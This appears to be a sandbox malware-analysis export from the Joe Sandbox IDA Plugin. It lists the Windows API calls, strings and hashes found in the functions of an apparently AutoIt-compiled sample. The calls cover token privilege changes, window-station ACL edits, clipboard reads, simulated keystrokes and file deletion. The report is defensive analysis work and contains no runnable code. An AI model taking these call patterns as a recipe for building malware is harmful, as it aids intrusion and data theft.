                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DB4388
                                                                                                                • IsIconic.USER32(000000FF), ref: 00DB4391
                                                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00DB439E
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00DB43A8
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DB43BE
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00DB43C5
                                                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00DB43D1
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DB43E2
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DB43EA
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00DB43F2
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00DB43F5
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB440A
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00DB4415
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB441F
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00DB4424
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB442D
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00DB4432
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB443C
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00DB4441
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00DB4444
                                                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00DB446B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 9f83c9906b579c57a4774531d568dff0946816755a9bb69991bbdfdcdeccbe52
                                                                                                                • Instruction ID: 0ca50e2cdf0eef8ca82243efe46dd2ed1705f2b92ec5d11ab544c4f2696d032d
                                                                                                                • Opcode Fuzzy Hash: 9f83c9906b579c57a4774531d568dff0946816755a9bb69991bbdfdcdeccbe52
                                                                                                                • Instruction Fuzzy Hash: 92319671A80319BBEB216B719C49FBF7E6DEB44B50F154025FA05EA2D1C6B09D10EEB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E022E8,?,00000000,?,00D43E2E,?,00000000,?,00DDDBF0,00000000,?), ref: 00D4BE8B
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D43E2E,?,00000000,?,00DDDBF0,00000000,?,00000002), ref: 00D4BEA7
                                                                                                                • __wsplitpath.LIBCMT ref: 00D4BF19
                                                                                                                  • Part of subcall function 00D6297D: __wsplitpath_helper.LIBCMT ref: 00D629BD
                                                                                                                • _wcscpy.LIBCMT ref: 00D4BF31
                                                                                                                • _wcscat.LIBCMT ref: 00D4BF46
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D4BF56
                                                                                                                • _wcscpy.LIBCMT ref: 00D4C03E
                                                                                                                • _wcscpy.LIBCMT ref: 00D4C1ED
                                                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 00D4C250
                                                                                                                  • Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
                                                                                                                  • Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153
                                                                                                                  • Part of subcall function 00D4C320: _memmove.LIBCMT ref: 00D4C419
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_$"
                                                                                                                • API String ID: 2542276039-3082565913
                                                                                                                • Opcode ID: 9e6936e7c0f53c0276590eae52d8e7ba9e8961d9f46f1c10eec295a11a096826
                                                                                                                • Instruction ID: 77c90a83dbcc8bf9cd6c2f18d94ac2f8eb125e159cb089a47dad53217efad728
                                                                                                                • Opcode Fuzzy Hash: 9e6936e7c0f53c0276590eae52d8e7ba9e8961d9f46f1c10eec295a11a096826
                                                                                                                • Instruction Fuzzy Hash: 7F427B715093459FD710EF60C881BABB7E8EF95300F04482AF58697252EB71EA49DBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D7BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D7BF0F
                                                                                                                  • Part of subcall function 00D7BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7BF3C
                                                                                                                  • Part of subcall function 00D7BEC3: GetLastError.KERNEL32 ref: 00D7BF49
                                                                                                                • _memset.LIBCMT ref: 00D7BA34
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D7BA86
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00D7BA97
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D7BAAE
                                                                                                                • GetProcessWindowStation.USER32 ref: 00D7BAC7
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 00D7BAD1
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D7BAEB
                                                                                                                  • Part of subcall function 00D7B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D7B9EC), ref: 00D7B8C5
                                                                                                                  • Part of subcall function 00D7B8B0: CloseHandle.KERNEL32(?,?,00D7B9EC), ref: 00D7B8D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 2063423040-1027155976
                                                                                                                • Opcode ID: 6678505481f8d09d0144427674dd845085c71ff86c4ac48f4d15735f570c6e0a
                                                                                                                • Instruction ID: 262518c70b5960f66dd3eb375981385f85d01a390411a6f19ce61915dbf786e3
                                                                                                                • Opcode Fuzzy Hash: 6678505481f8d09d0144427674dd845085c71ff86c4ac48f4d15735f570c6e0a
                                                                                                                • Instruction Fuzzy Hash: C9813D7190020EAFDF119FA4CD45EEEBB79EF04314F18852AF919A6261EB318E15DB30
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA
                                                                                                                  • Part of subcall function 00D87B9F: __wsplitpath.LIBCMT ref: 00D87BBC
                                                                                                                  • Part of subcall function 00D87B9F: __wsplitpath.LIBCMT ref: 00D87BCF
                                                                                                                  • Part of subcall function 00D87C0C: GetFileAttributesW.KERNEL32(?,00D86A7B), ref: 00D87C0D
                                                                                                                • _wcscat.LIBCMT ref: 00D86B9D
                                                                                                                • _wcscat.LIBCMT ref: 00D86BBB
                                                                                                                • __wsplitpath.LIBCMT ref: 00D86BE2
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00D86BF8
                                                                                                                • _wcscpy.LIBCMT ref: 00D86C57
                                                                                                                • _wcscat.LIBCMT ref: 00D86C6A
                                                                                                                • _wcscat.LIBCMT ref: 00D86C7D
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00D86CAB
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00D86CBC
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00D86CDB
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00D86CEA
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 00D86CFF
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00D86D10
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D86D37
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D86D53
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D86D61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1867810238-1173974218
                                                                                                                • Opcode ID: ffd499dfc715ff205a5a5fc5e89c481b62dac19281df269f438e34ffcc6f17c5
                                                                                                                • Instruction ID: 46b775154a2db7da6a5eac5c391bba0fa63b6119d026109e7811392b009be579
                                                                                                                • Opcode Fuzzy Hash: ffd499dfc715ff205a5a5fc5e89c481b62dac19281df269f438e34ffcc6f17c5
                                                                                                                • Instruction Fuzzy Hash: 91512F72904259AACB21EBA0DC45EEE777DAF09314F0845E6E559E3141EB30EB88CF71
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(00DDDBF0), ref: 00D970C3
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00D970D1
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00D970D9
                                                                                                                • CloseClipboard.USER32 ref: 00D970E5
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00D97101
                                                                                                                • CloseClipboard.USER32 ref: 00D9710B
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00D97120
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00D9712D
                                                                                                                • GetClipboardData.USER32(00000001), ref: 00D97135
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00D97142
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00D97176
                                                                                                                • CloseClipboard.USER32 ref: 00D97283
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 3222323430-0
                                                                                                                • Opcode ID: 4f2f3cb6bdc5b88b8af618c964774c98ea84334fb29ff1bc7090bfb7102218cd
                                                                                                                • Instruction ID: bcbe487fd20e6eb8a5927f13b90071eddd6cef9c6f561c018ac11e5104942dfd
                                                                                                                • Opcode Fuzzy Hash: 4f2f3cb6bdc5b88b8af618c964774c98ea84334fb29ff1bc7090bfb7102218cd
                                                                                                                • Instruction Fuzzy Hash: E151B231218306ABDB10EB64DC86F6EB7A9EF84B00F144529F586D62D1EB70D905CB72
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00D8FE03
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D8FE57
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8FE7C
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8FE93
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8FEBA
                                                                                                                • __swprintf.LIBCMT ref: 00D8FF06
                                                                                                                • __swprintf.LIBCMT ref: 00D8FF3F
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • __swprintf.LIBCMT ref: 00D8FF93
                                                                                                                  • Part of subcall function 00D6234B: __woutput_l.LIBCMT ref: 00D623A4
                                                                                                                • __swprintf.LIBCMT ref: 00D8FFE1
                                                                                                                • __swprintf.LIBCMT ref: 00D90030
                                                                                                                • __swprintf.LIBCMT ref: 00D9007F
                                                                                                                • __swprintf.LIBCMT ref: 00D900CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 108614129-2428617273
                                                                                                                • Opcode ID: 4f5ba2769e10fde0337992eb9d428520c3fbe8888c67b253561142aa643197ce
                                                                                                                • Instruction ID: 5e1159402272f03afa410437a8b2746a79722774c7da9cc0736e3ce20e68ba5f
                                                                                                                • Opcode Fuzzy Hash: 4f5ba2769e10fde0337992eb9d428520c3fbe8888c67b253561142aa643197ce
                                                                                                                • Instruction Fuzzy Hash: BBA1FBB2418344ABC750EBA4CC86DAFB7EDEF94700F44092DB585C6151EB34EA49CBB2
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D92065
                                                                                                                • _wcscmp.LIBCMT ref: 00D9207A
                                                                                                                • _wcscmp.LIBCMT ref: 00D92091
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00D920A3
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00D920BD
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00D920D5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D920E0
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00D920FC
                                                                                                                • _wcscmp.LIBCMT ref: 00D92123
                                                                                                                • _wcscmp.LIBCMT ref: 00D9213A
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D9214C
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00DF3A68), ref: 00D9216A
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D92174
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D92181
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D92191
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1803514871-438819550
                                                                                                                • Opcode ID: 7c5bc64f36f4a913d85fa50444dc5b660f13ad1ec61fccf101f2423057be61b6
                                                                                                                • Instruction ID: 61bd5cb7c1f5d9d6a4b49ca5665542b8492f94856efac5a70d05adb3ff2e8cd7
                                                                                                                • Opcode Fuzzy Hash: 7c5bc64f36f4a913d85fa50444dc5b660f13ad1ec61fccf101f2423057be61b6
                                                                                                                • Instruction Fuzzy Hash: 35318F3150131A7FDF20EBA4EC48EEE77ADAF09360F184166F915E2190DB70DA54CA74
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D921C0
                                                                                                                • _wcscmp.LIBCMT ref: 00D921D5
                                                                                                                • _wcscmp.LIBCMT ref: 00D921EC
                                                                                                                  • Part of subcall function 00D87606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D87621
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00D9221B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D92226
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00D92242
                                                                                                                • _wcscmp.LIBCMT ref: 00D92269
                                                                                                                • _wcscmp.LIBCMT ref: 00D92280
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D92292
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00DF3A68), ref: 00D922B0
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D922BA
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D922C7
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D922D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1824444939-438819550
                                                                                                                • Opcode ID: 9bbe7928a5a8d86abc2cef4fe9e455e11831bf8977b1c9de3877a407a7092430
                                                                                                                • Instruction ID: a2474906d562932958d17e2ff36cb37cd97f3a773e3a8175bd401c534ddcbbd1
                                                                                                                • Opcode Fuzzy Hash: 9bbe7928a5a8d86abc2cef4fe9e455e11831bf8977b1c9de3877a407a7092430
                                                                                                                • Instruction Fuzzy Hash: C631A33150171A7ECF24EBA4EC49EFE77ADAF45320F1841A5E910E2190DB70DA99CB78
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove_memset
                                                                                                                • String ID: Q\E$[$\$\$\$]$^
                                                                                                                • API String ID: 3555123492-286096704
                                                                                                                • Opcode ID: bcb99cfa304158f22a5ec74fff98cde099f366e86b9be36a5e34304828389253
                                                                                                                • Instruction ID: ad5bb6d6217b26869be6004c1848ed4c398ae57857fade744dfaedcbf1a7971f
                                                                                                                • Opcode Fuzzy Hash: bcb99cfa304158f22a5ec74fff98cde099f366e86b9be36a5e34304828389253
                                                                                                                • Instruction Fuzzy Hash: D1728E71D0421ACBDF24CF98C880BADBBB1FF45314F2981A9D856AB241D734EE81DB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2448ee7af9cdf7adb144507c0fe7a752f1f8e4c680bd73b39a2851d73ee01706
                                                                                                                • Instruction ID: e0069ca0c532efa7df97e52646ac07bff840b833168756575a3498cf197b8962
                                                                                                                • Opcode Fuzzy Hash: 2448ee7af9cdf7adb144507c0fe7a752f1f8e4c680bd73b39a2851d73ee01706
                                                                                                                • Instruction Fuzzy Hash: 55326D75B122698FDB24CF59DC40AE9B7B5FB4A310F4841D9E44AE7A81D7309E80CF62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00D7B903
                                                                                                                  • Part of subcall function 00D7B8E7: GetLastError.KERNEL32(?,00D7B3CB,?,?,?), ref: 00D7B90D
                                                                                                                  • Part of subcall function 00D7B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00D7B3CB,?,?,?), ref: 00D7B91C
                                                                                                                  • Part of subcall function 00D7B8E7: HeapAlloc.KERNEL32(00000000,?,00D7B3CB,?,?,?), ref: 00D7B923
                                                                                                                  • Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00D7B93A
                                                                                                                  • Part of subcall function 00D7B982: GetProcessHeap.KERNEL32(00000008,00D7B3E1,00000000,00000000,?,00D7B3E1,?), ref: 00D7B98E
                                                                                                                  • Part of subcall function 00D7B982: HeapAlloc.KERNEL32(00000000,?,00D7B3E1,?), ref: 00D7B995
                                                                                                                  • Part of subcall function 00D7B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D7B3E1,?), ref: 00D7B9A6
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D7B3FC
                                                                                                                • _memset.LIBCMT ref: 00D7B411
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D7B430
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00D7B441
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00D7B47E
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D7B49A
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00D7B4B7
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D7B4C6
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00D7B4CD
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D7B4EE
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00D7B4F5
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D7B526
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D7B54C
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D7B560
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                • String ID:
